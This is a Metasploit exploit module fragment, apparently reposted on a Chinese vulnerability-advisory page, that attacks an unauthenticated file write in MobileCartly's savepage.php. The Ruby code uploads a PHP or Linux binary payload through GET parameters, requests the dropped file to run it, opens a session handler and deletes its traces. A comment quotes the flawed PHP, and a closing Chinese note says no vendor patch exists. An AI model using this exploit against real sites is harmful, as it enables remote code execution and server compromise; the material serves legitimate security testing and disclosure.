def on_new_session(cli)
if cli.type == "meterpreter"
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
end
@clean_files.each do |f|
print_status("#{@peer} - Removing: #{f}")
begin
if cli.type == 'meterpreter'
cli.fs.file.rm(f)
else
cli.shell_command_token("rm #{f}")
end
rescue ::Exception => e
print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
end
end
end
def exploit
@peer = "#{rhost}:#{rport}"
#
# Init target path
#
target_uri.path << '/' if target_uri.path[-1,1] != '/'
base = File.dirname("#{target_uri.path}.")
#
# Configure payload names
#
php_fname = Rex::Text.rand_text_alpha(5) + ".php"
bin_fname = Rex::Text.rand_text_alpha(5)
@clean_files = [php_fname]
#
# Generate a payload based on target
#
case target['Platform']
when 'php'
p = "<?php #{payload.encoded} ?>"
when 'linux'
bin_fname << '.bin'
@clean_files << bin_fname
bin = generate_payload_exe
p = get_write_exec_payload("/tmp/#{bin_fname}", bin)
end
#
# Upload payload
#
print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)")
res = send_request_cgi({
'uri' => "#{base}/includes/savepage.php",
'vars_get' => {
'savepage' => php_fname,
'pagecontent' => p
}
})
if not res
print_error("#{@peer} - No response from server, will not continue.")
return
end
#
# Run payload
#
print_status("#{@peer} - Requesting '#{php_fname}'")
send_request_raw({'uri' => "#{base}/pages/#{php_fname}"})
handler
end
end
=begin
*facepalm*
<?php
$page = "../pages/" . $_REQUEST['savepage'];
$content = $_REQUEST['pagecontent'];
file_put_contents($page, $content);
?>
=end
建议:
--------------------------------------------------------------------------------
厂商补丁:
mobilecartly
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: